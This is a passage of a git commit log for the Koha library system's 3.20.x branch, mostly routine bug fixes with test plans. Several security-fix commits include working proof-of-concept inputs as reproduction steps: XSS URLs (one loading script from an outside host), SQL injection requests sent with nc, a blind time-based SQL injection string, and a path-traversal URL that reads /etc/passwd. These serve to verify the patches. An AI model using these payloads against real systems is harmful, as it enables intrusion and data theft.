  - A logged in user is able to see suggestions made by someone else.
3/ AnonSuggestions = 1 and OPACViewOthersSuggestions = 0
  - A non logged in user is able to make a suggestion.
  The suggestedby field will be filled with the AnonymousPatron pref value.
  He is not able to see suggestions, even the ones made by AnonymousPatron.
  - A logged in user is not able to see suggestions made by someone else.
4/ AnonSuggestions = 1 and OPACViewOthersSuggestions = 1
  - A non logged in user is able to make a suggestion.
  He is able to see all suggestions.
  - A logged in user is able to see suggestions made by someone else.

In all cases a logged in user should be able to search for suggestions
(except if he is not able to see them).

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
All use cases tested, work as expected
No errors

Only comment is perhaps (in the future) a gracefull failure
when AnonymousPatron is not set, or has '0' value

Message is DBIx::Class::ResultSet::create(): Column 'suggestedby' cannot be null at ...

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit be35039b55a351c97f2c1f9a5b373cb26ac5e0b0)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
9 years agoBug 10866: Hide patron's history if intranetreadinghistory is set to not allow
Jonathan Druart [Wed, 22 Apr 2015 10:14:24 +0000 (12:14 +0200)]
Bug 10866: Hide patron's history if intranetreadinghistory is set to not allow

If set to "not allow", the intranetreadinghistory pref prevent staff
members to access patron's checkout history.
But:
1/ The page is still accessible if you know the url
2/ The history can be consulted on the item history page

Test plan:
0/ Don't apply this patch
1/ Set the intranetreadinghistory to allow
2/ Go on a patron's checkout history page
3/ Open a new tab and go on a item's checkout history page
4/ Set the intranetreadinghistory to not allow
5/ Refresh both pages => no change
6/ Apply this patch
7/ Refresh both page.
On the first page, you should see a warning
On the other one, you should see that the patron column is not displayed
anymore.

Followed test plan, results were as expected.
Signed-off-by: Marc Véron <veron@veron.ch>
http://bugs.koha-community.org/show_bug.cgi?id=10886
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Nice addition!
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit d847b1d92a9df6db2bb5321f032f3ec13d6ba55d)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
9 years agoBug 14403: Remove warn in Koha::NorwegianPatronDB
Magnus Enger [Wed, 17 Jun 2015 12:36:44 +0000 (14:36 +0200)]
Bug 14403: Remove warn in Koha::NorwegianPatronDB

Line 99 has an unconditional warn, left over from development:

warn "$combined_username => $combined_password";

This patch deletes the line i question.

To test:
No testing needed, just have a look at the diff and see that
it makes sense to delete the warn.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit b740b1b412e11b1d540b243e7b1767cc0c1cb962)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
9 years agoBug 13427: jQuery Timepicker is not translated on returns page
Katrin Fischer [Mon, 8 Jun 2015 03:04:56 +0000 (05:04 +0200)]
Bug 13427: jQuery Timepicker is not translated on returns page

The returns page was missing an include with the translated strings.

To test:
- Install an additional language, like de-DE
- Confirm the bug on the returns page
  - Make sure SpecifyReturnDate is activated
  - Open the datepicker, look at the time settings
- Apply the patch
- Reinstall the language, no update of the po files is needed
- Retest
- Verify, that now the time settings are translated

Signed-off-by: Josef Moravec <josef.moravec@gmail.com>
Works as expected

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 688452ad7e9131a53a96bd826e6228e73494fa53)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
9 years agoBug 11467: Bug Untranslatable srings in opac-detail.tt (IDreamBooks*, OpacBrowseResults)
Katrin Fischer [Mon, 8 Jun 2015 01:18:35 +0000 (03:18 +0200)]
Bug 11467: Bug Untranslatable srings in opac-detail.tt (IDreamBooks*, OpacBrowseResults)

Patch marks several strings in the Javascript on the OPAC detail
and result page for translation.

1) IDreamBooks*
- Activate the 3 IDreamBooks* system preferences
- Check the 'cloud' and additional content shows up correctly on
  the detail and result pages
- Verify everything works as expected and the same as without the patch

2) OpacBrowseResults
- Activate OpacBrowseResults
- Do various searches
- Verify the nex, previous, browse result list features still
  work the same as without the patch

Bonus: Check new strings appear in the .po files by updating one
       language with the patch applied (perl translate update de-DE)

NOTE: Really should have read the test plan more closely.
      I couldn't find the 'Go to detail:' section, until I clicked
      'Browse results'.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 7ab873aaea298c787e93438012fa8792345664f4)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
Conflicts:
koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-detail.tt

9 years agoMerge branch '3.20.2' into 3.20.x
Chris Cormack [Thu, 25 Jun 2015 21:09:33 +0000 (09:09 +1200)]
Merge branch '3.20.2' into 3.20.x

9 years agoBug 14440: get_template_and_user can not have an empty template_name (quote*_ajax.pl)
Jonathan Druart [Wed, 24 Jun 2015 09:03:22 +0000 (11:03 +0200)]
Bug 14440: get_template_and_user can not have an empty template_name (quote*_ajax.pl)

This patch uses check_api_auth instead of get_template_and_user.

Test plan:
Confirm that you are still able to access to the quote editor with the
edit_quotes permission.
Confirm that you are not if you don't have the permission.

wget your_url/cgi-bin/koha/tools/quotes/quotes_ajax.pl
should return "403 : Forbidden."

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 08871a324fa731ffdbbe87afde1ee145c604a22b)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)
Fridolin Somers [Tue, 23 Jun 2015 15:45:30 +0000 (17:45 +0200)]
Bug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)

Since Bug 14408, the method get_template_and_user can not have an empty template_name.
Pages calling with an empty value should use C4::Auth::checkauth()

This patch corrects opac/opac-ratings.pl

Test plan :
- Apply patch
- Set sysopref OpacStarRatings to 'results and details'
- Disable Javascipt on your browser (otherwise it will use ajax)
- Login at OPAC
- Go to a record
- Click on a button left of 'Rate me' to choose a rating, ie 4
- Click on 'Rate me'
=> The page is reloaded and you see 'your rating: 4'
- Loggout from OPAC
- Try to access URL : http://<serveur>/cgi-bin/koha/opac-ratings.pl
=> You see the loggin page

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit f1acb5615d0cbcba5db5b84e12fbad3d41454347)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14440: get_template_and_user can not have an empty template_name (updatesupplier.pl)
Fridolin Somers [Tue, 23 Jun 2015 14:45:21 +0000 (16:45 +0200)]
Bug 14440: get_template_and_user can not have an empty template_name (updatesupplier.pl)

Since Bug 14408, the method get_template_and_user can not have an empty template_name.
Pages calling with an empty value should use C4::Auth::checkauth()

This patch corrects acqui/updatesupplier.pl

Test plan :
- Apply patch
- Connect to intranet with a user having "vendors_manage" permission
- Go to acquisition module
- Create a new vendor
- Click on "Edit vendor"
- Change some information and save
=> Your change is saved
- Connect to intranet with a user not having "vendors_manage" permission
- Try to access <intranet>/cgi-bin/koha/acqui/updatesupplier.pl
=> Access is denied
- Disconnect from intranet
- Try to access <intranet>/cgi-bin/koha/acqui/updatesupplier.pl
=> Access is denied

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 015c26a5e36dae5070eab57f400237715d93ae44)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoRevert "bug 14440 - work around for empty tt filenames"
Chris Cormack [Thu, 25 Jun 2015 21:07:58 +0000 (09:07 +1200)]
Revert "bug 14440 - work around for empty tt filenames"

This reverts commit dd5cf241cb9f867d9c85e6e40685f2ccd9ff5e3d.

9 years agoBug 14450: itemsearch no longer working
Liz [Wed, 24 Jun 2015 09:52:05 +0000 (09:52 +0000)]
Bug 14450: itemsearch no longer working

To test:
Click Advanced search in staff client
Click the link for "Go to Item Search" at the top of the page
Do a search, you should get results. Try some combinations and make sure it works like it should.

Signed-off-by: Jacek Ablewicz <abl@biblos.pk.edu.pl>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit f900ea03bf15746bd2c310b59f2fb06972f6bdee)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agobug 14440 - work around for empty tt filenames
Liz Rea [Tue, 23 Jun 2015 23:20:58 +0000 (11:20 +1200)]
bug 14440 - work around for empty tt filenames

This is a work around for the bug of not accepting empty template names.

To test:

Make sure all of these functions still work.

Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 11011: Rephrasing 'in keyword' in OPAC authority search
Aleisha [Tue, 9 Jun 2015 18:20:52 +0000 (18:20 +0000)]
Bug 11011: Rephrasing 'in keyword' in OPAC authority search

Using 'in the complete record' rather than 'in keyword'. I think this fits well as it seems that this means the search looks anywhere in the record.

To test:

1) In the OPAC, click on Authority Search
2) Notice that in the drop-down menu for the 'Where:' field, there is an 'in keyword' option.
3) Apply patch
4) Now says 'in the complete record'

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 892d374b64fa4eed98955d75b517702f78f1ca40)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 8686: Raise required version of URI::Escape to 3.31
Katrin Fischer [Sun, 7 Jun 2015 21:45:10 +0000 (23:45 +0200)]
Bug 8686: Raise required version of URI::Escape to 3.31

Raises the minimum required version of URI::Escape from
1.36 to 3.31.

TEST PLAN
---------
1) git branch -b bug_8686 origin/master
2) ./koha_perl_deps.pl -a | grep URI
   -- it will list 1.36 required
3) git bz apply 8686
4) ./koha_perl_deps.pl -a | grep URI
   -- it will list 3.31 required
5) koha qa test tools

NOTE: Also default in Ubuntu 14.04 LTS,
      not just Wheezy as noted in comment #15.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signoff based on Nicole's comment (bug 9990 comment 6):
"This stops happening if you upgrade URI::Escape to
3.31.  We should make it clear in the Perl Modules page that an upgrade
is needed."
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 7c0c92807f49ef61aa975e84cf26d42f7dfa425f)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBumping version number v3.20.01
Chris Cormack [Tue, 23 Jun 2015 07:37:51 +0000 (19:37 +1200)]
Bumping version number

9 years agoRelease notes, txt format
Chris Cormack [Tue, 23 Jun 2015 07:32:51 +0000 (19:32 +1200)]
Release notes, txt format

9 years agoTranlsation updates
Chris Cormack [Tue, 23 Jun 2015 02:12:55 +0000 (14:12 +1200)]
Tranlsation updates

Merge remote-tracking branch 'bernardo/3.20.01' into 3.20.x

9 years agoTranslation updates for Koha 3.20.1 release
Bernardo Gonzalez Kriegel [Tue, 23 Jun 2015 00:20:17 +0000 (21:20 -0300)]
Translation updates for Koha 3.20.1 release

9 years agoBug 14423 : Multiple XSS bugs in suggestion.pl
Chris [Sun, 21 Jun 2015 09:35:07 +0000 (09:35 +0000)]
Bug 14423 : Multiple XSS bugs in suggestion.pl

To test
1/ Hit a url like http://localhost:8081/cgi-bin/koha/suggestion/suggestion.pl?author=%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&accepteddate_to=
2/ Notice alert box(es)
3/ Apply patch
4/ Reload and notice alert is gone

Repeat for
collection_title
copyrightdate
isbn
manageddate_from
manageddate_to
publishercode
suggesteddate_from
suggesteddate_to

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14423 : Multiple XSS vulnerabilities in serials-search
Chris [Sun, 21 Jun 2015 09:20:51 +0000 (09:20 +0000)]
Bug 14423 : Multiple XSS vulnerabilities in serials-search

To test

1/ Hit a url like http://localhost:8081/cgi-bin/koha/serials/serials-search.pl?bookseller_filter=%22%22%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&searched=1&title_filter=
2/ Notice alert boxes
3/ Apply patch
4/ Reload, notice fixed

Repeat for
callnumber_filter
EAN_filter
ISSN_filter
publisher_filter
title_filter

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14423 : XSS bugs in catalogue search
Chris [Sun, 21 Jun 2015 09:01:32 +0000 (09:01 +0000)]
Bug 14423 : XSS bugs in catalogue search

To test

1/ hit a url like http://localhost:8081/cgi-bin/koha/catalogue/search.pl?limit=%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice alert boxes
3/ Apply patch
4/ Reload url, no alerts
5/ Check search still works

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14423 XSS bug in auth_subfields_structure
Chris [Sun, 21 Jun 2015 08:33:13 +0000 (08:33 +0000)]
Bug 14423 XSS bug in auth_subfields_structure

1/ Hit a url like http://localhost:8081/cgi-bin/koha/admin/auth_subfields_structure.pl?op=add_form&authtypecode=%27%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&tagfield=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice a ton of alert boxes pop up
3/ Apply patch
4/ Reload url, no longer get any alerts
5/ Test fuctionality still works

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14423 : XSS bug in lateorders
Chris [Sun, 21 Jun 2015 08:18:20 +0000 (08:18 +0000)]
Bug 14423 : XSS bug in lateorders

1/ hit a url like http://localhost:8081/cgi-bin/koha/acqui/lateorders.pl?delay=<script>alert('oh noes')</script>&estimateddeliverydatefrom
2/ Not you get an alert box
3/ Apply patch notice it is fixed
4/ Test functionality still works

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14423 : XSS in authorities-home
Chris [Sun, 21 Jun 2015 08:10:20 +0000 (08:10 +0000)]
Bug 14423 : XSS in authorities-home

To test:
1/ Hit a url like http://localhost:8081/cgi-bin/koha/authorities/authorities-home.pl?op=do_search&type=intranet&marclist=mainentry&and_or=and&operator=contains&value=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice you get 3 alert boxes
3/ Apply patch
4/ Hit the url again, no js

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14426: Escape or use placeholders for sql parameters
Jonathan Druart [Mon, 22 Jun 2015 08:56:26 +0000 (10:56 +0200)]
Bug 14426: Escape or use placeholders for sql parameters

Does this patch enough to prevent sql injection in borrowers_out.pl?

====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')"
| nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')"
| nc testbox 9002

====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a"
| nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b"
| nc testbox 9002

====================================================================

Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14408: Allow integers in template paths
Jonathan Druart [Mon, 22 Jun 2015 08:24:51 +0000 (10:24 +0200)]
Bug 14408: Allow integers in template paths

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 64e47c63dc59669c3c651b93630c470e06107fd6)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14408: Add tests to get_template_and_user
Jonathan Druart [Fri, 19 Jun 2015 08:25:30 +0000 (10:25 +0200)]
Bug 14408: Add tests to get_template_and_user

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 5dd7c8f0d5fae67ea6177fdbac77a04f70661864)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14408: Path Traversal error
Chris [Mon, 22 Jun 2015 05:23:52 +0000 (05:23 +0000)]
Bug 14408: Path Traversal error

Counter counter patch
Please test well, including with the null byte %00, this uses a whitelisting to only allow files ending with .tt
and not allowing ../etc

Note the previous patch tries to protect against /etc/passwd
but //etc/passwd is now vulnerable.  I do think a whitelist is safer than trying to do a blacklist

/cgi-bin/koha/svc/virtualshelves/search
/cgi-bin/koha/svc/members/search

Are vulnerable

To test:
1/ Hit /cgi-bin/koha/svc/members/search?template_path=members/tables/members_results.tt
  Notice you get a valid JSON response
2/ Hit
/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  (You may have add more ..%2f or remove them to get the correct path)
  Notice you can see the contents of the /etc/passwd file
3/ Hit
/cgi-bin/koha/svc/members/search?template_path=test%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4/ Apply patch
5/ Hit the first url again, notice it still works
6/ Hit the second url notice it now errors with a file not found
7/ Hit the third url notice it now errors with a file not found

Repeat for the other script also

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 5a7f459290326e1cea8460bb0817492340dd4150)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14412: SQL injection possible
Chris Cormack [Thu, 18 Jun 2015 20:35:07 +0000 (08:35 +1200)]
Bug 14412: SQL injection possible

There is a SQL Injection vulnerability in the
/cgi-bin/koha/opac-tags_subject.pl script.

By manipulating the variable 'number', the database can be accessed
via time-based blind injections.

The following string serves as an example:

/cgi-bin/koha/opac-tags_subject.pl?number=1+PROCEDURE+ANALYSE+(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)

To exploit the vulnerability, no authentication is needed

To test
1/ Turn on mysql query logging
2/ Hit /cgi-bin/koha/opac-tags_subject.pl?number=1+PROCEDURE+ANALYSE+(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
3/ Check the logs notice something like
  SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT 1
  PROCEDURE ANALYSE
  (EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
4/ Apply patch
5/ Hit the url again
6/ Notice the log now only has
   SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT 1

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Confirmed the problem and the fix for it.
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 57b01fb655955ac630d6018d03f4d134e7e3e25a)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14418: More XSS vulnerabilities in opac-shelves.pl
Chris Cormack [Thu, 18 Jun 2015 23:41:45 +0000 (11:41 +1200)]
Bug 14418: More XSS vulnerabilities in opac-shelves.pl

To test:
1/ Hit a url like
/cgi-bin/koha/opac-shelves.pl?viewshelf=7&op=modif&display="><script>alert('oh
noes')</script>  Where the id is a valid shelf id
2/ Notice the js is executed
3/ Apply patch
4/ Reload page
5/ Notice input is now escaped on display

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Tested in Debian, couldn't reproduce the alert in Iceweasel, but in
Chromium. Patch fixes it.
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit cd4c959f7226b060f683f5571f030cc2df7539ca)

9 years agoBug 14418: XSS flaw in opac-shelves.pl
Chris Cormack [Thu, 18 Jun 2015 23:30:22 +0000 (11:30 +1200)]
Bug 14418: XSS flaw in opac-shelves.pl

To test:
1/ Create a list and add at least one item to it
2/ Hit a url like http://192.168.2.18/cgi-bin/koha/opac-shelves.pl?viewshelf=7&sort=author&direction=%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
  Where the shelf id is the number of the list you created, notice the js is executed
3/ Apply the patch
4/ Reload the page notice the js is now escaped

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit b6ca2b0cd2d95e8aedbfd7c0c58ace8200620bf1)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14418: XSS Vulnerabilities in OPAC search
Chris Cormack [Thu, 18 Jun 2015 21:25:22 +0000 (09:25 +1200)]
Bug 14418: XSS Vulnerabilities in OPAC search

Fix for /cgi-bin/koha/opac-search.pl

To test

1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script
src='http://cst.sba-research.org/x.js'/>&q=a
2/ Notice the js is executed
3/ Apply patch
4/ Reload page, notice it is no longer executed
5/ Test the rss links work still

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Confirmed bug and that the patch fixes it.
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 45dd7754019e8f525c8d52bf33c41016e5ccbfab)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14416: Stored XSS vulnerability - add biblio to shelf (intranet)
Jonathan Druart [Fri, 19 Jun 2015 09:21:56 +0000 (11:21 +0200)]
Bug 14416: Stored XSS vulnerability - add biblio to shelf (intranet)

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 542b06f065bf550a2a625bbfb34ce73bb65d01a1)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14416: (follow-up) opac addbybilionumber
Jonathan Druart [Fri, 19 Jun 2015 09:21:47 +0000 (11:21 +0200)]
Bug 14416: (follow-up) opac addbybilionumber

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit abd2bc99e886c11fa9abe15ef01c3298d00757cb)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14416: Stored XSS vulnerability
Chris Cormack [Thu, 18 Jun 2015 23:26:02 +0000 (11:26 +1200)]
Bug 14416: Stored XSS vulnerability

opac-addbybiblionumber.pl is also vulnerable because it doesn't escape
list names.

To test
1/ Create a malicious list name
2/ Try to add a biblio to the lists
3/ Notice js is excuted
4/ Apply patch
5/ Test again

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit fb51a4bb0f3ac8b42b53579fe3d6d73d0b3438cd)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>